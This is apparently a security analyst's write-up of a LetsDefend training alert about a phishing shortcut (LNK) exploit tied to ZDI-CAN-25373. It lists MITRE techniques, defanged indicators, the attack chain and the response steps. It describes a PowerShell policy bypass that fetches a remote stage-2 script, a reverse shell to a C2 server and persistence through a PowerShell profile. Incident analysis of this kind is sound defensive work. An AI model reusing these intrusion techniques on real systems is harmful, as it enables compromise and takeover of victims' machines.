SOC339 // ZDI-CAN-25373 Windows Shortcut Exploit Detected // inksec.io

// soc investigation 2026-04-28

SOC339 ZDI-CAN-25373 Windows Shortcut Exploit Detected

letsdefend High closed ✓ true positive

mitre/T1566-001 mitre/T1204-002 mitre/T1059-001 mitre/T1105 mitre/T1546-013 mitre/T1098 mitre/T1021-001 mitre/T1071-001

analyst verdict TRUE POSITIVE

✓

🎯 MITRE ATT&CK

T1566.001 - Initial Access: Phishing: Spearphishing Attachment T1204.002 - Execution: User Execution: Malicious File T1059.001 - Execution: Command and Scripting Interpreter: PowerShell T1105 - Command and Control: Ingress Tool Transfer T1546.013 - Persistence: Event Triggered Execution: PowerShell Profile T1098 - Persistence: Account Manipulation T1021.001 - Lateral Movement: Remote Services: Remote Desktop Protocol T1071.001 - Command and Control: Application Layer Protocol: Web Protocols

🔎 What

Alert SOC339 - ZDI-CAN-25373 fired on host Cooper after execution of 2025AnnualReport[.]lnk (SHA256: 6F927D74FB2075C60F2F7795B718CA571947F3D1E7B591D2D2FD5A35DD5503F8). User was phished via email from michael[.]johnson[@]pm[.]me (SMTP IP 3[.]5[.]132[.]248) and downloaded a zip which dropped the LNK to C:\Users\LetsDefend\Downloads. LNK executed PowerShell with ExecutionPolicy Bypass to retrieve stage 2 from hxxp[://]18[.]223[.]186[.]129:4444/MBS[.]ps1. Helpdesk account was added to Administrators and Remote Desktop Users groups. Reverse shell established from 172[.]31[.]23[.]112:49922 to C2 18[.]223[.]186[.]129:4444. Registry writes confirmed to HKLM\SOFTWARE\MICROSOFT\TRACING\POWERSHELL_RASAPI32. Persistence via PowerShell StartupProfileData-NonInteractive. Verdict: True Positive - Active Compromise. Response - email removed, LNK and zip deleted, persistence file removed, Helpdesk account removed from groups, machine contained.

🕐 When

Mar 20, 2025 - 01:48 PM

📍 Where

Host Cooper at 172[.]16[.]17[.]217. LNK dropped to C:\Users\LetsDefend\Downloads. Reverse shell from 172[.]31[.]23[.]112:49922 to 18[.]223[.]186[.]129:4444. Stage 2 from hxxp[://]18[.]223[.]186[.]129:4444/MBS[.]ps1.

👤 Who

Threat actor via phishing email from michael[.]johnson[@]pm[.]me through SMTP IP 3[.]5[.]132[.]248. Delivery via ZIP attachment containing malicious LNK. Actor established persistence, escalated privileges via Helpdesk account, enabled RDP, and maintained reverse shell C2 - consistent with hands-on-keyboard intrusion.

💡 Why

User executed LNK believing it to be a legitimate annual report. LNK abused Windows shortcut execution to bypass script policy and retrieve a remote payload, a known technique associated with ZDI-CAN-25373. Goal appears to be persistent privileged access and lateral movement via RDP.

🔬 Analysis Reports 🦠 VirusTotal https://www.virustotal.com/gui/file/6f927d74fb2075c60f2f7795b718ca571947f3d1e7b591d2d2fd5a35dd5503f8/details

https://hybrid-analysis.com/sample/6f927d74fb2075c60f2f7795b718ca571947f3d1e7b591d2d2fd5a35dd5503f8

https://hybrid-analysis.com/sample/6f927d74fb2075c60f2f7795b718ca571947f3d1e7b591d2d2fd5a35dd5503f8/68596ed6b7a761c27f0a11c2